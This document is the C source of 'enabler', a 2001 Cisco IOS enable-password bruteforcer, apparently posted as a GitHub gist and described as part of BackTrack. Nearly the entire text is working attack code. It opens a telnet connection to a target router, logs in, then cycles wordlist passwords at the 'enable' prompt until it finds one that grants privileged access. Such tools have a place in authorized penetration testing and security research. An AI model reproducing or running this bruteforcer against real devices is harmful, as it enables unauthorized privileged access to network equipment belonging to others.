Enabler, cisco enable bruteforcer
/* | |
enabler. | |
Cisco IOS privileged EXEC bruteforcer | |
Year: 2001 | |
Included in Linux Backtrack v2 | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <errno.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <netdb.h> | |
#include <signal.h> | |
#include <string.h> | |
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]" | |
struct sockaddr_in addr; | |
char host[100]; | |
struct hostent *hp; | |
int sock_stat; | |
int n,x; | |
char **password; | |
char resolve(char *inputhost) { | |
int a,b,c,d; | |
if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) { | |
hp = gethostbyname(inputhost); | |
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); } | |
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0], | |
(unsigned char)hp->h_addr_list[0][1], | |
(unsigned char)hp->h_addr_list[0][2], | |
(unsigned char)hp->h_addr_list[0][3]); | |
} | |
else { strncpy(host,inputhost,100); } | |
} | |
int sock(char *hostoresolve,int port) { | |
int err; | |
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); | |
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); } | |
addr.sin_family = PF_INET; | |
addr.sin_port = htons(port); | |
addr.sin_addr.s_addr = inet_addr(host); | |
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr)); | |
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); } | |
} | |
int banner() { | |
printf("\n%s enabler.\n", BOX); | |
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX); | |
printf("%s coded by norby\n", BOX); | |
} | |
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); } | |
void sig() { | |
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); } | |
printf("\n\033[0m"); exit(0); | |
} | |
int login(char *login, char *pass) { | |
char *input = malloc(4000); | |
int reqlogin; | |
while (read (sock_stat, input, 4000) > 0) { | |
if(strstr(input,"ogin:")||strstr(input,"sername:")) { | |
if(!strcmp(login,"n0login")) { | |
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX); | |
exit(0); | |
} | |
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break; | |
} | |
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; } | |
bzero(input,4000); | |
} | |
if(reqlogin==1) { | |
write(sock_stat,login,strlen(login)); | |
write(sock_stat,"\r\n",2); | |
while(read(sock_stat,input,4000)>0) { | |
if(strstr(input,"assword")); { break; } | |
} | |
} | |
write(sock_stat,pass,strlen(pass)); | |
write(sock_stat,"\r\n",2); | |
sleep(2); | |
bzero(input,4000); | |
while (read (sock_stat, input, 4000) > 0) { | |
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; } | |
/* if(strstr(input,"assword:")) { | |
printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0); | |
}*/ | |
if(strstr(input,"sername:")) { | |
printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0); | |
} | |
bzero(input,4000); | |
} | |
} | |
int loadwordlist(char *list) { | |
FILE *passlist; | |
char buf[32], fake; | |
int i,z; | |
if ((passlist = fopen(list, "r")) == NULL) { | |
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list); | |
exit(0); | |
} | |
(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale | |
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P | |
if(password == NULL) { | |
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX); | |
exit(0); | |
} | |
(void)fseek(passlist, 0L, SEEK_SET); | |
while (!feof(passlist)) { | |
fgets(buf, 32, passlist); | |
if (buf[0] == '#' || buf[0] == '\n') continue; | |
for (i = 0; i < strlen(buf); i++) | |
if (buf[i] == '\n'||buf[i] == '\r') buf[i] = '\0'; | |
password[x] = malloc(32); | |
strcpy(password[x], buf); | |
memset(buf, 0, 32); | |
x++; | |
} | |
password[x] = 0x0; | |
fclose(passlist); | |
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); } | |
} | |
int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;) | |
char *input = malloc(100); | |
int N; | |
bzero(input,100); | |
write(sock_stat,"enable",6); | |
write(sock_stat,"\r\n",2); | |
while(1) { | |
while(read(sock_stat,input,100)>0) { | |
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); } | |
if(n+1==x) break; | |
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break; | |
bzero(input,100); | |
} | |
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); } | |
if(strstr(input,"assword:")) { | |
write(sock_stat,password[n],strlen(password[n])); | |
write(sock_stat,"\r\n",2); | |
n++; | |
bzero(input,100); | |
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout); | |
continue; | |
} | |
if(strstr(input,">")) { | |
write(sock_stat,"enable\r\n",8); bzero(input,100); | |
} | |
} | |
} | |
int main(int argc, char *argv[]) { | |
int port; | |
signal(SIGINT, sig); | |
banner(); | |
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); } | |
if(!strcmp(argv[2],"-u")) { | |
if(argc==6) { port=atoi("23"); } | |
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare | |
// c'ho cosetta nella testa :� -- Corretto :) | |
printf("%s\n",BOX); | |
loadwordlist(argv[5]); | |
resolve(argv[1]); | |
sock(host, port); | |
login(argv[3],argv[4]); | |
brute(); | |
} | |
else { | |
if(argc==4) { port=atoi("23"); } | |
else { port=atoi(argv[4]); } | |
printf("%s\n",BOX); | |
loadwordlist(argv[3]); | |
resolve(argv[1]); | |
sock(host, port); | |
login("n0login",argv[2]); | |
brute(); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment